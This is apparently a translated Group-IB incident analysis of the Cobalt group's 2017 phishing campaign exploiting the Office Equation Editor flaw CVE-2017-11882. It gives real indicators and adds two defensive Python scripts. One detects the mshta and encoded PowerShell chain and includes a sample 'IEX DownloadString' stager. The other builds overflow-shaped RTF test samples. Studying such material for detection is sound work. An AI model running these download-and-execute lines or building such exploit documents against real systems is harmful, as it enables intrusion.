FinCERT, the information security division of the Central Bank of Russia, named the Cobalt group the main threat to banks in its latest report and called its attacks the main trend. Cobalt is indeed one of the most active and aggressive criminal groups today. By experts' count, over the past year it carried out at least 50 successful attacks around the world, constantly testing new tools and changing attack vectors and targets. Besides contactless attacks on ATMs, Cobalt tries to gain access to interbank transfer systems (SWIFT), payment gateways and card processing. In this article we show why traditional security tools cannot protect against attacks by groups like this, and what to do to protect your business from financial and reputational losses.
Text: Andrei Zosimov, virus analyst.
On November 14, 2017, experts from Embedi published a technical report on the vulnerability CVE-2017-11882 and demonstrated its exploitation across various versions of Microsoft Office. The vulnerability allows arbitrary code execution, including downloading executable files and running them. It has existed since 2000, when the vulnerable component, the Microsoft Equation Editor (EQNEDT32.EXE), was built. This component allows math formulas to be embedded in Office documents via OLE. With the release of Office 2007 the component was replaced, but the old version was kept for compatibility with old documents. So the vulnerability has existed for 17 years.
The CVE identifier itself was registered on July 31, 2017, and a few days later Embedi's experts reported the vulnerability to Microsoft. Microsoft's patch was released only on November 14, 2017.
Three days ago, on November 21, a proof-of-concept exploit for the vulnerability was published in Embedi's public GitHub repository (https://github.com/embedi/CVE-2017-11882), together with a Python script that lets anyone generate their own malicious .rtf document.
First activity
A few hours later, the Cobalt hacker group began a mass mailing of phishing emails to financial institutions, carrying a malicious document as an attachment that antivirus solutions did not detect:

The mailing distributed a malicious document named “Changes to the rules for making transfers. Rt” (MD5 F360D41A0B42B129F7F0C29F98381416, 31811 bytes).

The sending domain, “cards-cbr.ru”, was registered on the day of the mailing, 2017-11-21, and resolved to the IP address "104.254.99.77".
A second email, with an empty body, was also distributed.
Email headers:

As the headers show, the antivirus solution let the malicious email through, and the malicious attachment reached a bank employee.
Our TDS Polygon system detected the attack, issuing a 92% verdict, and a CERT Group-IB analyst notified the client about the incident:

The detected malicious document (MD5 F360D41A0B42B129F7F0C29F98381416) was uploaded to VirusTotal at 2017-11-21 13:27:59 (UTC), and at that time only the Rising antivirus detected it, as "Exploit.CVE-2017-11882.Gen!1.AED3 (CLASSIC)". It contained, and executed, the following command:

Judging by its structure, the document was clearly generated with the published Python script. Within a few hours other antivirus solutions started detecting the file as malicious, but the attackers responded immediately: they reworked the exploit so that it once again evaded many popular antivirus products (MD5 8993F927BEAF8DAA02BB792C86C2B5E0):


The domain swift-alliance.com was originally registered by an unrelated party on 2016-08-24; its registration expired on 2017-08-24, and the Cobalt operators, who tracked this, re-registered the name on 2017-11-21. swift-alliance.com now shares an IP address with "cards-cbr.ru", the domain used in the earlier mailing. At the time of writing (2017-11-22) all of these domains resolve to 139.59.89.20; earlier, on 2017-11-21, they resolved to 104.254.99.67:

The same group was behind both mailings: in each case the payload was downloaded from the IP address "138.68.234.128", a host that distributes Cobalt Strike. In the second case an HTA file was downloaded and executed via mshta.exe:

The downloaded HTA contains obfuscated JavaScript that ultimately runs an encoded PowerShell script:

Running this code downloads a PowerShell script from the remote host, “http://104.254.99.77/out.ps1”, and executes it. The downloaded PowerShell contains two encoded Cobalt Strike Beacons and launches the one matching the bitness (32- or 64-bit) of the OS.
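The chain described above (a command launched from the Equation Editor process, mshta.exe fetching a remote HTA, and an encoded PowerShell stager that downloads a further script) is exactly what behavioral detection keys on rather than file signatures. What follows is an added example, not code from the original article or a Group-IB tool: a small Python detector run over constructed Sysmon-style process-creation records. The field names (Image, ParentImage, CommandLine), file paths and example.invalid URLs are assumptions; the real stager in this campaign fetched http://104.254.99.77/out.ps1. The spawned command's parent is EQNEDT32.EXE because Word starts the Equation Editor as a separate COM server process, and that exploited process is the one that launches the attacker's command.

```python
import base64
import re

# Constructed stager in the shape of the one described above (the real one fetched
# http://104.254.99.77/out.ps1), encoded the way "powershell -enc" expects: UTF-16LE, base64.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/out.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed Sysmon-style process-creation records (Event ID 1 fields, simplified).
# Not telemetry from the incident; the paths and hostnames are assumptions.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\transfers.rtf"'},
    # Word starts the Equation Editor as an out-of-process COM server, so its parent is
    # the DCOM launcher (svchost.exe), not WINWORD.EXE.
    {"Image": EQNEDT, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"' + EQNEDT + '" -Embedding'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EQNEDT,
     "CommandLine": "mshta http://example.invalid/stage.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + ENC},
    # Benign administrative PowerShell: must not fire.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},
]

ENCODED_ARG_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOWNLOADER_RE = re.compile(
    r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a 'powershell -enc <base64>' argument, or None.
    PowerShell expects the base64 to decode to UTF-16LE text."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Behavioural rules over process-creation events; returns (rule, image, detail) tuples."""
    alerts = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev["CommandLine"]
        # 1. The Equation Editor has no business spawning anything; a child process means
        #    the exploited EQNEDT32.EXE is running the attacker's command.
        if parent == "eqnedt32.exe":
            alerts.append(("EquationEditorChild", image, cmd))
        # 2. mshta.exe pulling an HTA from a URL is the second-mailing stage described above.
        if image == "mshta.exe" and re.search(r"(?i)\bhttps?://", cmd):
            alerts.append(("MshtaRemoteHta", image, cmd))
        # 3. Encoded PowerShell that, once decoded, downloads and evaluates more code.
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded and DOWNLOADER_RE.search(decoded):
                alerts.append(("EncodedPowerShellDownloader", image, decoded))
    return alerts


if __name__ == "__main__":
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {image:16} {detail}")
```

None of the three rules depends on the hash of the document or on the C2 address; renaming the domain, re-padding the exploit or re-encoding the stager leaves the process chain, and therefore the alerts, unchanged.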
Changes
The reworked document differs little from the original, but there are differences. First, the RTF header was changed:

As you can see, the optional “objclass” keyword was removed from the object header:

The object name was changed from “Equation.3” to “1NYMiqIGRD”. Also, in the original version the space after the shellcode was padded with the letter “A”, whereas in the reworked exploit the remaining space is padded with spaces:

The signatures (marked in red) before and after the shellcode are unchanged. The main changes were made to the RTF header and to the header and trailer of the embedded object:

Here the attackers simply changed the picture parameters and added some of their own, none of which actually affect anything:
"picwgoal" and "pichgoal" - the desired width and height of the picture in twips
"picw" and "pich" - the width and height of the picture in pixels
"picscale" - picture scaling.
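Both the original PoC-style document and the reworked one can be told apart from a benign Equation Editor document by looking past the RTF control words into the embedded object itself. The script below is an added example, not the Embedi PoC generator or any Group-IB tool: it extracts \objdata blobs from RTF text, decodes the OLE1 embedded-object header, and checks the native data for the Equation Editor CLSID and for an MTEF FONT record whose name is too long for the buffer the Equation Editor copies it into (the field the public exploit overflows). The three RTF samples are constructed in the script (the native data is a stand-in carrying a CFB magic, the CLSID and one FONT record, not a valid compound file), the 36-byte limit is the buffer size reported in the Embedi analysis, and the FONT-record scan is a heuristic rather than a full MTEF parser. It shows why a signature on \objclass Equation.3 both misses the reworked variant and fires on legitimate equation documents, while the structural check hits only the two malicious samples.

```python
import re
import struct
import uuid

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE compound file header
EQUATION3_CLSID = uuid.UUID("{0002CE02-0000-0000-C000-000000000046}")  # Equation.3 (EQNEDT32)
MTEF_FONT_TAG = 0x08    # MTEF FONT record: tag, typeface, style, NUL-terminated name
FONT_NAME_LIMIT = 36    # 0x24: stack buffer the font name is copied into (per Embedi's analysis)

OBJDATA_RE = re.compile(rb"\{\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}")
OBJCLASS_RE = re.compile(rb"\{\\\*\\objclass\s+([^}]*)\}")


def build_native_data(font_name: bytes) -> bytes:
    """Constructed stand-in for the 'Equation Native' payload: CFB magic, the Equation
    Editor CLSID in the little-endian layout a CFB root entry uses, and one MTEF FONT
    record. Not a valid compound file; it carries only what the checks below inspect."""
    font_record = bytes([MTEF_FONT_TAG, 0x5A, 0x5A]) + font_name + b"\x00"
    return CFB_MAGIC + b"\x00" * 8 + EQUATION3_CLSID.bytes_le + b"\x00" * 4 + font_record


def build_ole1_object(class_name: bytes, native: bytes) -> bytes:
    """OLE1 object header as stored in \\objdata: version, format 2 (embedded),
    class name, empty topic and item names, then native data length and data."""
    out = struct.pack("<II", 0x00000501, 0x00000002)
    out += struct.pack("<I", len(class_name) + 1) + class_name + b"\x00"
    out += struct.pack("<II", 0, 0)
    return out + struct.pack("<I", len(native)) + native


def build_rtf(objclass, class_name: bytes, font_name: bytes) -> bytes:
    """Minimal RTF wrapper in the shape of the PoC; objclass=None omits \\objclass."""
    blob = build_ole1_object(class_name, build_native_data(font_name)).hex().encode("ascii")
    objclass_part = b"{\\*\\objclass " + objclass + b"}" if objclass else b""
    return (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\\pard{\\object\\objemb"
            + objclass_part + b"\\objw380\\objh260{\\*\\objdata " + blob + b"}}\\par}")


def parse_ole1(blob: bytes):
    """Return (class name, native data) from an OLE1 object header."""
    _version, fmt = struct.unpack_from("<II", blob, 0)
    pos = [8]  # cursor after the version and format fields

    def read_u32():
        (n,) = struct.unpack_from("<I", blob, pos[0])
        pos[0] += 4
        return n

    def read_str():
        n = read_u32()
        s = blob[pos[0]:pos[0] + n]
        pos[0] += n
        return s.rstrip(b"\x00")

    class_name = read_str()
    read_str(), read_str()  # topic and item names, unused here
    if fmt != 2:            # only embedded objects (format 2) carry native data
        return class_name, b""
    n = read_u32()
    return class_name, blob[pos[0]:pos[0] + n]


def longest_font_name(native: bytes) -> int:
    """Heuristic scan for MTEF FONT records (tag, two attribute bytes, printable
    NUL-terminated name); returns the longest name seen, 0 if none."""
    longest = 0
    for i in range(len(native) - 3):
        if native[i] != MTEF_FONT_TAG:
            continue
        end = native.find(b"\x00", i + 3)
        name = native[i + 3:end] if end > 0 else b""
        if name and all(0x20 <= b < 0x7F for b in name):
            longest = max(longest, len(name))
    return longest


def analyze_rtf(rtf: bytes) -> dict:
    m = OBJCLASS_RE.search(rtf)
    r = {"objclass": m.group(1).strip().decode("latin-1") if m else None,
         "ole1_class": None, "cfb_magic": False, "equation_clsid": False, "longest_font_name": 0}
    for m in OBJDATA_RE.finditer(rtf):
        blob = bytes.fromhex(re.sub(rb"\s+", b"", m.group(1)).decode("ascii"))
        class_name, native = parse_ole1(blob)
        r["ole1_class"] = class_name.decode("latin-1")
        r["cfb_magic"] = r["cfb_magic"] or native.startswith(CFB_MAGIC)
        r["equation_clsid"] = r["equation_clsid"] or EQUATION3_CLSID.bytes_le in native
        r["longest_font_name"] = max(r["longest_font_name"], longest_font_name(native))
    # Naive signature of the kind the reworked sample evades: the RTF-level class hint.
    r["signature_hit"] = r["objclass"] == "Equation.3"
    # Structural check: an Equation Editor object (by CLSID, whatever the headers say)
    # whose FONT record name cannot fit the buffer it is copied into.
    r["structural_hit"] = r["equation_clsid"] and r["longest_font_name"] > FONT_NAME_LIMIT
    return r


# Constructed samples mirroring the article: the original (\objclass present, class
# "Equation.3", padded with "A"), the reworked one (no \objclass, class renamed, padded
# with spaces) and a benign equation document with an ordinary font name.
COMMAND = b"cmd.exe /c calc.exe"
ORIGINAL_RTF = build_rtf(b"Equation.3", b"Equation.3", COMMAND.ljust(44, b"A"))
REWORKED_RTF = build_rtf(None, b"1NYMiqIGRD", COMMAND.ljust(44, b" "))
BENIGN_RTF = build_rtf(b"Equation.3", b"Equation.3", b"Times New Roman")

if __name__ == "__main__":
    for label, sample in (("original", ORIGINAL_RTF), ("reworked", REWORKED_RTF),
                          ("benign", BENIGN_RTF)):
        print(label, analyze_rtf(sample))
```

Against a real document the native data is a genuine compound file, so a production version would walk the CFB directory to the "Equation Native" stream and parse MTEF records properly instead of scanning for the tag byte; the point here is that the checks that survive the attackers' edits are the ones made on the object's contents, not on the RTF keywords around it.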
The conclusion: slight changes to the document were enough to leave antivirus solutions powerless against the attack.
What is the way out? Threat intelligence lets you stay aware of the attacks hacker groups are conducting, and traffic analysis systems and sandboxes deliver verdicts on malicious files based not on signatures but on behavioral analysis and an accumulated knowledge base of each hacker group's characteristic behavior.
Read the full version on the Group-IB blog.